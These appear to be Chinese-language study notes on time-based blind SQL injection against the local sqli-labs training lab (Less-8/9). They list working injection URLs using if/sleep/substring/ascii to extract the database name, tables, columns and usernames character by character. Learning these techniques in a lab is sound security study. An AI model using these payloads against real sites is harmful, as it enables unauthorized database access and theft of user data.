延时注入和布尔盲注差不多
为什么要延时
因为有的时候我们知道这个地方存在注入但是页面返回信息一样
加了个if延时条件判断
if(条件,是,否)
http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201
返回14秒
http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(10),1)--%201
正常返回4秒
length(database())=1
获取到了数据库长度
请求:localhost/Less-8/index.php?id=1' and if(length(database())=8,sleep(3),1) -- 11
返回:正常
用到两个函数
substring 截取字符串(1.截取哪个字符串, 2 从哪一位开始,3 取几位)
获取数据库库名:
http://localhost/Less-8/index.php?id=1' and if((select substring(database(),1,1))='s',sleep(3),1) -- 1 获取库名的第一位
ascii
http://localhost/Less-8/index.php?id=1' and if((select ascii(substring(database(),1,1)))=1,sleep(3),1) -- 1 通过ascii编码获取数据库名第一位
http://localhost/Less-8/index.php?id=1' and if((select ascii(substring(database(),2,1)))=1,sleep(3),1) -- 1 通过ascii编码获取数据库名第二位
结果:
115 101 99 117 114 105 116 121
s e c u r i t y
回顾:
select count(table_name) from information_schema.tables where table_schema='security' 获取security库中的表的数量
http://localhost/Less-8/index.php?id=1' and if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(3),1) -- 1 获取到当前库中有4个表
http://localhost/Less-8/index.php?id=1' and if((select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6,sleep(3),1) -- 1 第一个表的长是6位
http://localhost/Less-8/index.php?id=1' and if((select length(table_name) from information_schema.tables where table_schema='security' limit 1,1)=8,sleep(3),1) -- 1 第二张表的长度是8位
http://localhost/Less-8/index.php?id=1' and if((select length(table_name) from information_schema.tables where table_schema='security' limit 2,1)=7,sleep(3),1) -- 1
http://localhost/Less-8/index.php?id=1' and if((select length(table_name) from information_schema.tables where table_schema='security' limit 3,1)=5,sleep(3),1) -- 1
获取表的内容:
http://localhost/Less-8/index.php?id=1' and if((select ascii(substring(table_name,1,1)) from information_schema.tables where table_schema='security' limit 0,1)=1,sleep(3),1) -- 1 获取第一个表的第一个内容
101 109 97 105 108 115
e m a i l s
获取第四张表的内容:
http://localhost/Less-8/index.php?id=1' and if((select ascii(substring(table_name,1,1)) from information_schema.tables where table_schema='security' limit 4,1)=1,sleep(3),1) -- 1
字段:
http://localhost/Less-8/index.php?id=1' and if((select count(column_name) from information_schema.columns where table_name='users' and table_schema='security')=3,sleep(3),1) -- 1 判断字段数量
判断字段第一个内容
http://localhost/Less-8/index.php?id=1' and if((select ascii(substring(column_name,1,1)) from information_schema.columns where table_name='users' and table_schema='security' limit 1,1)=3,sleep(3),1) -- 1 查询当前users 表中第二列字段
返回117 115 101 114 110 97 109 101
username
http://localhost/Less-8/index.php?id=1' and if((select ascii(substring(column_name,1,1)) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=3,sleep(3),1) -- 1
获取数据
localhost/Less-8/index.php?id=1' and if((select ascii(substring(username,1,1)) from users limit 0,1)=3,sleep(3),1) -- 1 获取当前数据库users表中的username字段的第一行第一个内容
68 117 109 98
字节
内容
数据
长度如果一样的话,是两种情况
1.是不存在这个
2.我们ascii码,没包含到这个字符